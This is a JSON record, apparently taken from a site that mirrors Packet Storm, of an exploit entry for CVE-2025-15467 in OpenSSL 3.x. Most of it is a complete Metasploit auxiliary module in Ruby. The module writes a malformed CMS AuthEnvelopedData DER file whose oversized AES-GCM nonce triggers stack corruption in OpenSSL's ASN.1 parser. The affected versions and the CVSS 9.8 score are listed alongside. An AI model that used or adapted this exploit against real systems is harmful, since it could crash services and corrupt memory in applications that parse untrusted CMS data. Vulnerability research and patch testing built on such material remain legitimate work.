{“lastseen”:”2026-01-29T16:30:04″,”description”:”This Metasploit auxiliary module generates a specially crafted CMS file encoded in DER format to test a stack-based buffer overflow vulnerability in OpenSSL’s ASN.1 parser related to improper handling of oversized AES-GCM nonce IV values within…”,”published”:”2026-01-29T00:00:00″,”modified”:”2026-01-29T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption”,”source”:””,”references”:””,”id”:”PACKETSTORM:214573″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-15467″],”sourceData”:”=============================================================================================================================================\\n | # Title : OpenSSL 3.x ASN.1 AES\u2011GCM Nonce Stack Corruption via CMS AuthEnvelopedData |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 147.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.openssl-library.org\/ |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/214422\/ \\u0026 CVE\u20112025\u201115467\\n \\n [+] Summary : This Metasploit auxiliary module generates a specially crafted CMS file encoded in DER format to test a stack-based buffer overflow vulnerability in OpenSSL\u2019s ASN.1 \\n parser related to improper handling of oversized AES-GCM nonce (IV) values within AES-GCM-Parameters as defined in RFC 5084. \\n The malformed structure is embedded inside a valid-looking AuthEnvelopedData CMS container (RFC 5083), \\n \\t\\t\\t\\t allowing the file to pass basic structural validation while triggering memory corruption during decoding.\\n The issue affects multiple OpenSSL 3.x branches, including versions 3.0.x prior to 3.0.19, 3.3.x prior to 3.3.6, \\n \\t\\t\\t\\t 3.4.x prior to 3.4.4, 3.5.x prior to 3.5.5, and 3.6.0 prior to 3.6.1, when parsing untrusted CMS data. \\n \\t\\t\\t\\t Successful triggering may result in stack corruption and application crash, with potential security impact depending on the execution context.\\n \\n [+] POC :\\n \\n ##\\n # This module requires Metasploit: https:\/\/metasploit.com\/download\\n # Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n ##\\n \\n class MetasploitModule \\u003c Msf::Auxiliary\\n include Msf::Exploit::FILEFORMAT\\n \\n def initialize(info = {})\\n super(update_info(info,\\n ‘Name’ =\\u003e ‘OpenSSL ASN.1 Parser Stack Corruption Test Generator (CVE-2025-15467)’,\\n ‘Description’ =\\u003e %q{\\n This module generates a CMS file in DER format that simulates an AuthEnvelopedData \\n structure according to RFC 5084. It is designed to test for a stack-based buffer \\n overflow vulnerability during the ASN.1 decoding process, specifically when \\n handling oversized Nonce (IV) lengths within the AES-GCM-Parameters structure.\\n },\\n ‘Author’ =\\u003e [ ‘indoushka’ ],\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘References’ =\\u003e [\\n [‘CVE’, ‘2025-15467’],\\n [‘RFC’, ‘5084’],\\n [‘RFC’, ‘5083’]\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SERVICE_DOWN],\\n ‘Reliability’ =\\u003e [LOW_RELIABILITY]\\n }\\n ))\\n \\n register_options([\\n OptString.new(‘FILENAME’, [ true, ‘The output file name.’, ‘openssl_test.cms’]),\\n OptInt.new(‘IV_SIZE’, [ true, ‘The size of the malicious Nonce to trigger stack overwrite.’, 2048])\\n ])\\n end\\n def der_encode(tag, data)\\n len = data.length\\n if len \\u003c 128\\n tag + [len].pack(‘C’) + data\\n else\\n len_str = [len].pack(‘N’).sub(\/^(\\\\x00)+\/, ”)\\n tag + [0x80 | len_str.length].pack(‘C’) + len_str + data\\n end\\n end\\n \\n def build_cms_structure\\n iv_len = datastore[‘IV_SIZE’]\\n nonce = der_encode(\\”\\\\x04\\”, \\”A\\” * iv_len)\\n gcm_params = der_encode(\\”\\\\x30\\”, nonce)\\n aes_gcm_oid = \\”\\\\x06\\\\x09\\\\x60\\\\x86\\\\x48\\\\x01\\\\x65\\\\x03\\\\x04\\\\x01\\\\x2E\\”\\n algo_id = der_encode(\\”\\\\x30\\”, aes_gcm_oid + gcm_params)\\n content_type_data = \\”\\\\x06\\\\x09\\\\x2A\\\\x86\\\\x48\\\\x86\\\\xF7\\\\x0D\\\\x01\\\\x07\\\\x01\\”\\n encrypted_content_info = der_encode(\\”\\\\x30\\”, content_type_data + algo_id)\\n auth_env_body = \\n \\”\\\\x02\\\\x01\\\\x00\\” + \\n \\”\\\\x31\\\\x00\\” + \\n encrypted_content_info + \\n \\”\\\\x04\\\\x10\\” + (\\”B\\” * 16) \\n auth_env_oid = \\”\\\\x06\\\\x0B\\\\x2A\\\\x86\\\\x48\\\\x86\\\\xF7\\\\x0D\\\\x01\\\\x09\\\\x10\\\\x01\\\\x17\\”\\n explicit_content = der_encode(\\”\\\\xA0\\”, auth_env_body)\\n der_encode(\\”\\\\x30\\”, auth_env_oid + explicit_content)\\n end\\n \\n def run\\n file_content = build_cms_structure\\n file_create(file_content)\\n print_good(\\”Artifact created successfully for Stack Overwrite testing.\\”)\\n print_status(\\”RFC 5084 compliant GCM parameters used with IV size: #{datastore[‘IV_SIZE’]}\\”)\\n end\\n end\\n \\n Greetings to :============================================================\\n jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|\\n ==========================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214573″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214573\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-29T16:30:04″,”description”:”This Metasploit auxiliary module generates a specially crafted CMS file encoded in DER format to test a stack-based buffer overflow vulnerability in OpenSSL’s ASN.1 parser…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-38141","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n